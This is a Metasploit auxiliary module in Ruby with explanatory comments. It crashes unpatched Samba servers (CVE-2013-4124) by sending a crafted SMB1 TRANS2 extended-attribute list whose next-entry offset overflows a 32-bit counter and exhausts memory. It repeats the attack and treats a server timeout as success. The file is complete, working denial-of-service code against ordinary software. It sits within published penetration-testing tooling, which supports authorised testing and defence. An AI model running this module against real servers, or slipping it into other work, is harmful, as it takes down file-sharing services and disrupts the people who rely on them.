##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/struct2'

# Auxiliary denial-of-service module for CVE-2013-4124 (see 'References' below):
# an integer overflow in Samba's read_nttrans_ea_list that leads to memory
# exhaustion when a crafted extended-attribute (EA) list is processed.
#
# The module speaks SMB1 only (see `connect(versions: [1])` in #run) and relies
# on the authenticated SMB client mixin for login and tree-connect. As the
# description states, the target share must have "ea support" enabled for the
# server to parse the EA list at all.
#
# Defensive note: the only protocol-level signal the module produces is a
# TRANS2 request carrying an oversized EA list; servers patched to the versions
# named in the description are not affected.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client::Authenticated

  # Parameter block for the TRANS2 request built in #send_pkt.
  # All three fields are 16-bit little-endian (Rex::Struct2 'v' suffix).
  TRANS2_PARAM = Rex::Struct2::CStructTemplate.new(
    [ 'uint16v', 'FID',       0 ],
    [ 'uint16v', 'InfoLevel', 0 ],
    [ 'uint16v', 'Reserved',  0 ],
  )

  # One entry of the FEA (full extended attribute) list: a 32-bit offset to the
  # next entry, a flags byte, the name length, the value length, then the name
  # and value bytes. 'Name'/'Value' are variable-length strings with no fixed
  # size, so each instance is serialised with whatever the caller assigns.
  FEA_LIST = Rex::Struct2::CStructTemplate.new(
    [ 'uint32v', 'NextOffset', 0  ],
    [ 'uint8',   'Flags',      0  ],
    [ 'uint8',   'NameLen',    0  ],
    [ 'uint16v', 'ValueLen',   0  ],
    [ 'string',  'Name', nil,  '' ],
    [ 'string',  'Value', nil, '' ]
  )

  # Registers module metadata and options.
  #
  # Options:
  #   SMBShare - target share to tree-connect to (required, no default).
  #   MsgLen   - length of each EA value in #mk_items_payload (default 1500).
  #   Tries    - number of iterations #run performs before giving up (default 40).
  #
  # SMB::ProtocolVersion is deregistered because #run hard-codes SMB1 via
  # `connect(versions: [1])`, so a user-supplied version would be ignored.
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Samba read_nttrans_ea_list Integer Overflow',
      'Description' => %q{
        Integer overflow in the read_nttrans_ea_list function in nttrans.c in
        smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before
        4.0.8 allows remote attackers to cause a denial of service (memory
        consumption) via a malformed packet. Important Note: in order to work,
        the "ea support" option on the target share must be enabled.
      },
      'Author'      =>
        [
          'Jeremy Allison', # Vulnerability discovery
          'dz_lnly'         # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['OSVDB', '95969'],
          ['BID', '61597'],
          ['EDB', '27778'],
          ['CVE', '2013-4124']
        ],
      ))

    register_options(
      [
        OptString.new('SMBShare', [true, 'Target share', '']),
        OptInt.new('MsgLen', [true, 'How soon a memory get exhausted depends on the length of that attribute', 1500]),
        OptInt.new('Tries', [true, 'Number of DOS tries', 40]),
      ])

    deregister_options('SMB::ProtocolVersion')
  end

  # Opens "/" on the currently tree-connected share and returns the FileID
  # from the response payload, for use as the TRANS2 'FID' parameter.
  #
  # @return [Integer] the FID reported by the server
  # @raise whatever `simple.client.create` raises on failure (not rescued here)
  def get_fid
    ok = self.simple.client.create("/")
    return ok['Payload'].v['FileID']
  end

  # Builds the FEA list body sent as the TRANS2 data section.
  #
  # Three FEA_LIST entries are serialised back to back: two entries whose
  # 'Value' is `MsgLen` NUL bytes, and a third small "padding" entry. Names are
  # random alpha strings of 5-7 characters plus a terminating NUL.
  #
  # NOTE(review): 'NameLen' for item2 and item3 is copied from item1's name
  # length rather than their own; since each name has an independent random
  # length this can disagree with the actual 'Name' bytes — confirm whether that
  # is intended.
  #
  # @return [String] the concatenated raw bytes of the three entries
  def mk_items_payload
    item1 = FEA_LIST.make_struct
    item1.v['ValueLen'] = datastore['MsgLen']
    item1.v['Value'] = "\x00" * datastore['MsgLen']
    item1.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
    item1.v['NameLen'] = item1.v['Name'].length # includes the trailing NUL
    item2 = FEA_LIST.make_struct
    item2.v['ValueLen'] = datastore['MsgLen']
    item2.v['Value'] = "\x00" * datastore['MsgLen']
    item2.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
    item2.v['NameLen'] = item1.v['Name'].length
    item3 = FEA_LIST.make_struct # Some padding
    item3.v['ValueLen'] = 4
    item3.v['Value'] = "\x00\x00\x00\x00"
    item3.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
    item3.v['NameLen'] = item1.v['Name'].length

    # Serialised length of the first entry; item1 points exactly past itself.
    ilen = item1.to_s.length
    item1.v['NextOffset'] = ilen
    # Wrap offset to 0x00
    # (item2's offset is chosen so that offset + ilen overflows a 32-bit counter)
    item2.v['NextOffset'] = 0xffffffff - ilen + 1
    return item1.to_s + item2.to_s + item3.to_s
  end

  # Issues one TRANS2 request carrying the crafted EA list.
  #
  # Parameter block: FID from #get_fid, InfoLevel 1015
  # (SMB_FILE_FULL_EA_INFORMATION), Reserved left at 0.
  # Subcommand 0x08 is TRANS2_SET_FILE_INFORMATION.
  # The final `false` argument to `trans2` presumably disables waiting for the
  # response (the server is expected to stop answering) — confirm against the
  # Rex SMB client signature.
  def send_pkt
    fid = get_fid

    trans = TRANS2_PARAM.make_struct
    trans.v['FID'] = fid
    trans.v['InfoLevel'] = 1015 # SMB_FILE_FULL_EA_INFORMATION
    data = mk_items_payload
    subcmd = 0x08
    self.simple.client.trans2(subcmd, trans.to_s, data.to_s, false)
  end

  # Main loop: up to `Tries` times, connect over SMB1, authenticate,
  # tree-connect to the configured share, send the packet and probe the server.
  #
  # A Timeout::Error on the follow-up `create("")` is treated as success and
  # the method returns immediately (note: without calling `disconnect`).
  # An InvalidType response means the server is still answering; the loop
  # disconnects and tries again. Any other exception propagates and also skips
  # `disconnect` for that iteration.
  #
  # `datastore['SMBSHARE']` resolves to the 'SMBShare' option: Metasploit
  # datastore keys are case-insensitive.
  def run
    print_status("Trying a max of #{datastore['Tries']} times...")
    datastore['Tries'].times do
      connect(versions: [1]) # SMB1 only; SMB::ProtocolVersion was deregistered
      smb_login()
      self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")

      print_status('Sending malicious package...')
      send_pkt

      begin
        # Liveness probe: a server that stopped responding will time out here.
        self.simple.client.create("")
        print_error('Server Answered, DoS unsuccessful')
      rescue Timeout::Error
        print_good('Server timed out, this is expected')
        return
      rescue Rex::Proto::SMB::Exceptions::InvalidType
        print_error('Server Answered, DoS unsuccessful')
      end
      disconnect()
    end
  end
end